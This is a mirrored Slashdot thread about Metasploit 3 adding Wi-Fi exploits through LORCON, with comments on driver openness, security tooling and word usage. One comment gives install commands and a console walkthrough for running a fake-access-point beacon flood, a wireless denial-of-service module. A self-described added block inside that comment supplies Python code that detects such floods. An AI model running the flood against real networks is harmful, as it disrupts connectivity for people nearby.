Slashdot Mirror


Wi-Fi Exploits Coming to Metasploit

bucksDrop writes "Eweek.com is reporting that the Metasploit Project will add 802.11 (Wi-Fi) exploits to a new version of its point-and-click attack tool. Metasploit 3 will integrate kernel-mode payloads to allow users to use existing user-mode payloads for both kernel and non-kernel exploits. Metasploit is collaborating with Jon 'Johnny Cache' Ellch and implementing it by wrapping the LORCON library."

50 comments

  1. Thanks Guys by 99BottlesOfBeerInMyF · · Score: 3, Insightful

    No really, I appreciate all the work that goes into putting this together. I'm sure privately distributed cracking tools already have some of this functionality. Maybe this will get OS vendors to pay a little more attention to wireless security. Wireless is not likely to be widely exploited mechanism for a worm, but it is still something that needs more attention.

    1. Re:Thanks Guys by solevita · · Score: 1

      The tools required for wireless worms have been available to Windows users for some time now, if you know where to look:

      Wireless Weapons of Mass Destruction

    2. Re:Thanks Guys by cmdrbuzz · · Score: 1

      Ummm, you realize that Slashcode adds a [nofollow] attribute to your HREF URLs so your comment spamming won't affect anything much.

      Except make you look a little silly.

  2. Math problem by Anonymous Coward · · Score: 3, Funny

    W=10.1
    F=9.8
    i=2673.7

    What is Wi-Fi?

    1. Re:Math problem by richdun · · Score: 2, Funny

      0.3i

    2. Re:Math problem by Anonymous Coward · · Score: 1, Funny

      Everyone do this and pass it to your friends or you will have bad luck.

    3. Re:Math problem by dr.badass · · Score: 4, Funny

      i=2673.7

      With Metasploit you can make i = 4456.66

      --
      Don't become a regular here -- you will become retarded.
    4. Re:Math problem by Anonymous Coward · · Score: 3, Informative

      For those too lazy to work it out...

      Wi-Fi = i(W-F) = 3673.7 ( 0.3) = 802.11

    5. Re:Math problem by Anonymous Coward · · Score: 0

      I don't have that good of math skills, but I think the answer to your formula is 31337.

    6. Re:Math problem by Afecks · · Score: 1

      Wi-Fi = 802.11 ahhh I see the joke now... humor, how quaint

    7. Re:Math problem by Anonymous Coward · · Score: 0

      And here I thought it was sqrt(-1).

      Although all those engineers like calling that j for some reason.

    8. Re:Math problem by Grym · · Score: 4, Funny

      My God! That'd be like 9/11 times 4.8921! We can't allow this to happen!

      -Grym

    9. Re:Math problem by Daxster · · Score: 1

      Off-topic, but i = current in amperes for [electrical] engineers. So j is used. 'Course, doesn't help that i, j, and k are unit vectors..

      --
      Death by snoo-snoo!
    10. Re:Math problem by Anonymous Coward · · Score: 0

      With Metasploit you can make i = 4456.66

      For the lazy:
      W = 10.1
      F = 9.8
      i = 4456.66

      W-F = 0.3
      0.3 * i = 1336.99

      Clever. But someone needs to get a life.

  3. So..... by robpoe · · Score: 2, Funny

    Do I wrap my laptop in tinfoil yet, or not?

    --
    = Grow a brain...
    1. Re:So..... by Anal+Cock · · Score: 0

      Even better, wrap the attacker in tin foil. He'll probably need therapy.

      --
      AC
  4. This begs the question... by mohjlir · · Score: 2, Interesting

    Why don't hardware vendors simply release the source to their drivers so problems like this can be squashed quickly? Of course, there is no guarantee that the white hats will find problems before the black hats do, but it exposes flaws to more eyeballs.

    1. Re:This begs the question... by 99BottlesOfBeerInMyF · · Score: 3, Insightful

      Why don't hardware vendors simply release the source to their drivers so problems like this can be squashed quickly?

      Some of them probably will, but a lot of hardware vendors are reflexively secretive. Others use the drivers to work around bugs in their products or are embarrassed of the shoddy quality of their code. I'd love to believe that the industry will start to demand open source drivers, but realistically, it is more likely that the OS developer community will have to account for untrusted hardware drivers by seriously re-architecting the way the kernel interacts with drivers.

    2. Re:This begs the question... by ehrichweiss · · Score: 2, Informative

      I don't know why others might not release their drivers' source but I know that Broadcom apparently can't do it for at least some of their wireless cards because they apparently can be tuned into some military-only frequencies and needless to say that's not a good thing.

      --
      0x09F911029D74E35BD84156C5635688C0
    3. Re:This begs the question... by cdrguru · · Score: 2, Insightful

      The number one reason this isn't done is the difference between the hardware manufactured by the driver author and the hardware manufactured by slave labor in China is the driver. Period. The chips are nearly a commodity now. There isn't anything unique about that - it is how they are used in the software.

      15-20 years ago, it was the design of the hardware that was where the value was. Today, it is mostly the software running the hardware.

      An open driver just means that they are giving away whatever value the design has to the factory in China which will sell the same unit for half the price. Not a real effective way to stay in business.

    4. Re:This begs the question... by Anonymous Coward · · Score: 0

      "An open driver just means that they are giving away whatever value the design has to the factory in China which will sell the same unit for half the price. Not a real effective way to stay in business."

      Consumer electronics is commodities period, the driver can't magically turn the card into something else.
      Competing in commodities with double the manufacturing cost and expect to stay in business, what are you talking about?

    5. Re:This begs the question... by scoot80 · · Score: 1

      Why would any hardware vondor release open source drivers? So that the competition can look at them? I remember someone commenting at another thread asking that firmware for hardware be open sourced too. Hardware vendors might as well then just put all their designs up on display, pack up their stuff and go home.

    6. Re:This begs the question... by Fred_A · · Score: 1

      More generally speaking, with a number of chipsets, you can change a number of parameters through software, notably emission power, sometimes frequency way outside of the extent of what is allowed for WiFi use (as per radio band use regulations).
      This is the main reason put forward by the makers for not releasing completely open drivers. If they did their gear couldn't be certified.

      --

      May contain traces of nut.
      Made from the freshest electrons.
    7. Re:This begs the question... by 99BottlesOfBeerInMyF · · Score: 1

      Why would any hardware vondor[sic] release open source drivers? So that the competition can look at them?

      Why would IBM contribute to an open source OS? So the competition can look at it? IBM is not in the business of selling OS's and by contributing to open source they get both other companies and the open source community to share the labor costs and make a better solution for both IBM and others. Likewise, hardware vendors are not in the business of selling drivers and those drivers could benefit significantly from free contributions and fixes from other companies and the open source community.

      I remember someone commenting at another thread asking that firmware for hardware be open sourced too. Hardware vendors might as well then just put all their designs up on display, pack up their stuff and go home.

      Apparently you've never heard of OpenFirmware which has for years and continues to power IBM supplied chipsets? Apparently you've not noticed the general trend towards EFI in recent PCs, another open firmware. No, very few companies have any significant intellectual property in their drivers, and those that do are protected by patents. The only real exceptions to this are graphics card manufacturers, whose drivers would probably make apparent all the shortcuts, work-arounds, hacks, and possible patent infringements in their code. There are reasons to keep drivers closed, but most of them are very bad ones from a consumer's perspective.

  5. I'm sure... by AdmiralWeirdbeard · · Score: 1

    ...that I speak for a lot of people, based on the low response to this particular gem of posting, when I say:
    *blinkblink*
    WTF, mate?

    --
    Come read my stupid blagablog. Rants and Giggles
  6. Script Kiddies tools for a wide open network by Gopal.V · · Score: 1

    I've played around with metasploit in the past, especially their VNC payloads. The tool seems to have a high likelihood of abuse, compared to a lot of the other security tools (starting from nmap,nessus and all). Except for a couple of courtesy terminals, the tool basically gets you in and gives you a general feeling of being in control.

    Canned scripts hardly ever teach you anything, especially when they work out of the box. Making them write their own exploits is the easiest way to get a script kiddie to learn a bit and grow up (sort of).

  7. another view by Anonymous Coward · · Score: 0

    could a "broken-in" device (driver) be the new
    challenged handshake?
    in English: once broken into a bad (wifi) driver
    the state the device is in is more secure since it
    cannot be "double" hacked???

  8. WEP keys? by Anonymous Coward · · Score: 0

    So will this make it even easier to get WEP Keys?

  9. You must be a perscriber by brunes69 · · Score: 0, Offtopic

    Modern usage

    More recently, "begs the question" has been used as a synonym for "invites the question" or "raises the question", or to indicate that "the question really ought to be addressed". In this usage, "the question" is stated in the next phrase. For example: "This year's budget deficit is half a trillion dollars. This begs the question: how are we ever going to balance the budget?" This usage is often sharply criticized by proponents of the traditional meaning, but it has nonetheless come into common use as a result of its use in the media, especially by people ignorant of its original use. Argument over whether this usage should be considered incorrect is an example of the debate between linguistic prescription and description.

    Personally I fall strongly on the description side. Prescription is useful when you are a student and learning language, but language is a construct for humans to communicate, and as such, description should be the primary motivation for a linguist. Language is how the majority use it, not how scholars define it.

    1. Re:You must be a perscriber by Dhalka226 · · Score: 3, Insightful

      Language is how the majority use it, not how scholars define it.

      So I guess "loose" and "lose" are now synonymous..

      I just really don't agree. I'm not the kind who generally goes off on people for misusing words as long as I can understand what they're trying to say, but at the same time, words have meanings. The fact that people have no idea how to properly use those words should not change what the words mean. It should just make us exceptionally sad at the state of affairs our communications skills are in.

      Incidentally, this is coming from somebody who misused the phrase "begs the question" dozens of times in his life. The difference being, when it was pointed out to me (I forget if somebody said something or I just came across the correct usage one day), I actually made a mental note of it and I have used it properly since then. It wasn't hard. Neither, as my little joke intimated, is using "lose" and "loose" properly. It just takes a little conscious effort at first, and then it will become second nature.

      Personally I think we should be getting people to do that rather than pandering to them and altering the meaning of words and phrases once we reach some ignorance threshold.

    2. Re:You must be a perscriber by onkelonkel · · Score: 1

      This is how enormity got to mean "something really big" instead of "a crime beyond all moral boundaries".

      Language defined by misuse. Usually done by lackwits in a misguided attempt to sound sophisticated, but ironically it demonstrates instead only their lack of language skills.

      These things grate like fingernails on the chalkboard of my soul. Mostly they make me very sad.

      --
      None of them can see the clouds; The polished wings don't care.
    3. Re:You must be a perscriber by foamrotreturns · · Score: 3, Insightful

      I am very much in agreement. If the masses are allowed to dictate whatever meaning they choose for words or phrases they hear, they will slowly erode the vast variety of meanings that can be conveyed through speech and writing. If I said "That begs the question" 75 years ago, most people would realize that I was calling out the speaker for using a circular argument. Saying "That begs the question" today evokes responses like "What question?" The meaning is nearly lost. We have hundreds of thousands of simple words and phrases that we use to convey much more complex concepts. If we let our language become eroded by the uneducated masses, how will we become educated? We will waste all of our time explaining our ideas in excruciating detail rather than using the previously ubiquitous simplified words and phrases that were crafted to symbolize those very concepts.
      Don't use words and phrases for which you haven't learned the meanings!

    4. Re:You must be a perscriber by udderly · · Score: 1

      That depends on what your definition of "is" is. Heh...just kidding.

    5. Re:You must be a perscriber by trewornan · · Score: 1

      If the masses are allowed to dictate whatever meaning they choose for words or phrases they hear, they will slowly erode the vast variety of meanings that can be conveyed through speech and writing


      It's not a matter of choice. Languages change over time - they always have and always will. You can argue that this is a bad thing, and you might even be right - but I guarantee you can't stop it.


      If you don't like it - tough! Suck it up and stop whining.

    6. Re:You must be a perscriber by AbRASiON · · Score: 1

      Anyways, I could care less about you're opinion your retarted!
      p.s did you get them legos for cheap?

      (Oh thank god FF2.0 marks "legos" as a spelling mistake and in case you missed it, I thoroughly agree with your post)

    7. Re:You must be a perscriber by SparcPlug · · Score: 1

      ...rather than pandering to them...

      Based on your reasoning, you never should have come to use the word pandering in this manner.

      The origins of pandering:

      The plot function of Pandarus in Chaucer's and especially Shakespeare's famous works has given rise to the English words to pander, meaning to further other people's illicit amours, and a pander (in later usage a panderer), a person who does this. The strong pejorative connotations of pander apparently come less from Chaucer's well-meaning young Pandarus than from Shakespeare's cynical uncle figure who concludes the play's epilogue by wishing upon the audience all his many diseases. A panderer is, specifically, a bawd -- a male who arranges access to female sexual favors, the manager of prostitutes. Thus, in law, the charge of pandering is an accusation that an individual has sold the sexual services of another.

      Your argument is that simply because his use of the phrase does not conform to its traditional use it is not valid. My response to you is that if linguistic constructions were never allowed to take on new meaning, you would never have thought to use pandering as it traditionally denoted something other than 'to appeal to'.

      IMO, this is not the way to go about using language. Truthfully, if one intended to denote circular reasoning there are much more obvious ways to do this. Actually saying 'circular reasoning' would for example be more concise.

  10. So where is the code? Right here. by spinja · · Score: 5, Informative

    Install the latest Lorcon snapshot:
    $ http://www.802.11mercenary.net/lorcon/

    Grab the latest version of metasploit 3:
    $ svn co http://metasploit.com/svn/framework3/trunk/

    Compile the Metasploit Lorcon wrapper:
    $ cd trunk/external/msflorcon
    $ make

    Plug in a support network card (I use a WPN511 with the madwifi-old driver in Gentoo)

    Load the Metasploit Console (as root, since it needs raw WiFi access)
    # trunk/msfconsole

    Play with some of the demo modules :-)

    This is an example of sending fake beacon requests to flood the Windows Wireless Network Browser:
    msf > use auxiliary/dos/wireless/fakeap
    msf auxiliary(fakeap) > show options

    Module options:

       Name       Current Setting  Required  Description
       ----       ---------------  --------  -----------
       CHANNEL    11               yes       The default channel number
       DRIVER     madwifi          yes       The name of the wireless driver for lorcon
       INTERFACE  ath0             yes       The name of the wireless interface

    Type the "run" command, or use "set VARIABLE VALUE" to change these options.

    msf auxiliary(fakeap) > run
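    The fakeap demo above floods a client's network browser with beacons for access points that do not exist. The defender-side counterpart is a monitor that notices such a flood: a burst of never-before-seen BSSIDs on one channel within a second or two is not how real access points appear. The following is an added example and is not code from this thread, from Metasploit or from LORCON. It assumes beacons have already been captured (for instance by a wireless IDS or a monitor-mode sniffer) and reduced to (timestamp, BSSID, SSID, channel) records; the sample records inside the block are constructed for the example, and the thresholds are assumptions to be tuned per site.

```python
"""Beacon-flood detector over pre-parsed 802.11 beacon records.

Added example for the fakeap discussion; not code from the thread, from
Metasploit or from LORCON. Input records are (timestamp_seconds, bssid,
ssid, channel) tuples that some capture stage has already produced.
"""
from collections import defaultdict, deque


def detect_beacon_flood(records, window_s=2.0, max_new_bssids=8):
    """Return one alert per burst of suspicious new BSSIDs on a channel.

    A BSSID counts as "new" the first time it is seen on a channel; real
    access points rarely appear in bulk, so more than ``max_new_bssids``
    first sightings within ``window_s`` seconds on the same channel is
    flagged. Each alert is (channel, first_ts, last_ts, new_bssid_count).
    Thresholds are assumed defaults, not values from the thread.
    """
    seen = defaultdict(set)      # channel -> every BSSID observed so far
    recent = defaultdict(deque)  # channel -> (ts, bssid) first sightings in window
    alerts = []
    for ts, bssid, _ssid, channel in sorted(records):
        if bssid in seen[channel]:
            continue             # repeats of a known AP are normal traffic
        seen[channel].add(bssid)
        window = recent[channel]
        window.append((ts, bssid))
        # Drop first sightings that have aged out of the sliding window.
        while window and ts - window[0][0] > window_s:
            window.popleft()
        if len(window) > max_new_bssids:
            alerts.append((channel, window[0][0], ts, len(window)))
            window.clear()       # one alert per burst, then start counting again
    return alerts


def constructed_sample():
    """Constructed beacon records: two real APs, then a fake-AP flood on channel 11."""
    recs = [
        (0.0, "00:1b:2f:aa:bb:01", "corp-office", 6),
        (0.1, "00:1b:2f:aa:bb:02", "corp-guest", 11),
        (0.2, "00:1b:2f:aa:bb:01", "corp-office", 6),   # repeat of a known AP
    ]
    # Twelve never-seen BSSIDs with throwaway SSIDs inside 0.55 s: the flood.
    for i in range(12):
        recs.append((10.0 + i * 0.05, f"02:00:00:00:00:{i:02x}", f"Free WiFi {i}", 11))
    return recs


if __name__ == "__main__":
    for channel, t0, t1, count in detect_beacon_flood(constructed_sample()):
        print(f"ALERT channel {channel}: {count} new BSSIDs between t={t0:.2f}s and t={t1:.2f}s")
```

    The per-channel "seen" set is what keeps a stable office of many legitimate access points from alerting on every scan: only first sightings count, so the detector reacts to churn in BSSIDs rather than to their number. Keyed on a real deployment, the same loop runs over a live feed by replacing constructed_sample() with the capture stage's output.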

    1. Re:So where is the code? Right here. by towsonu2003 · · Score: 3, Funny

      sounds to me like it needs a GUI ;)

    2. Re:So where is the code? Right here. by slack_prad · · Score: 1

      As a matter of fact, it does: a web console (but it is not that stable)

      --
      Sent from my desktop computer
  11. At least now we can know... by Cid+Highwind · · Score: 1

    Hopefully now that the code is out there, someone independent (not Ellch and not a Mac blogger) will test this exploit on an out-of-the-box MacBook, and see if the hole lives up to the hype.

    --
    0 1 - just my two bits
  12. pleeze uze fonetix by Anonymous Coward · · Score: 0

    It is the only spelling and grammar combination that actually makes sense

    so..

    luse

    thare

    itz

  13. This explains my recent Trojan infection by mhackarbie · · Score: 1

    I recently removed a nasty trojan (a member of the 'Wareout' family) from my laptop, with the aid of the free Sophos Anti-Rootkit and fantastic free technical support from the great folks at the spybot forums. My best guess was that I got the infection when I logged into a free wifi connection at a local cafe. I saw a brief message from my antivirus software that a trojan had been detected, but afterwards, it reported nothing. After reading the eweek article, I learned that my Intel Pro/Wireless driver had major security vulnerabilities. I just downloaded the update and hopefully will be malware-free for a little while. So much precious development time was wasted because of this infection!

    --
    Building a better ribosome since 1997
  14. How is this a good thing? by AaronLawrence · · Score: 1

    Proof of concept exploits are one thing, arguably useful. But helpfully integrating them into a tool script kiddies can use is just wrong. This is the kind of thing that makes computer security an ongoing nightmare.

    --
    For every expert, there is an equal and opposite expert. - Arthur C. Clarke
    1. Re:How is this a good thing? by azemute · · Score: 1

      Because acceptance of the fact that there *is* a problem is the first step on the road to solving that problem. A whole mob of scriptkiddies get their hands on this, and someone is bound to take notice. Maybe not now, but in the near future. Until that happens, and it gets some spotlight coverage, no one is going to even recognize wireless as a security threat.

      Just pretending that the problem doesn't exist, doesn't make the problem go away.

    2. Re:How is this a good thing? by Anonymous Coward · · Score: 0

      You're missing the point of the tool ...

      A bulldozer in the hands of a trained professional can enhance the productivity of a construction crew tenfold. That same machinery in the hands of an amateur can destroy an entire city block. Risk is something we must tolerate in all aspects of life in exchange for progress.

      While somewhat dangerous, Metasploit exists as a tool for security professionals. Providing analysts and pen-testers with an automated, extendable framework for managing and deploying their tools can enhance their productivity. I would hope that the ultimate benefits provided by the tool to the security community surpass the limited threat posed by the "wrong people" playing with the software.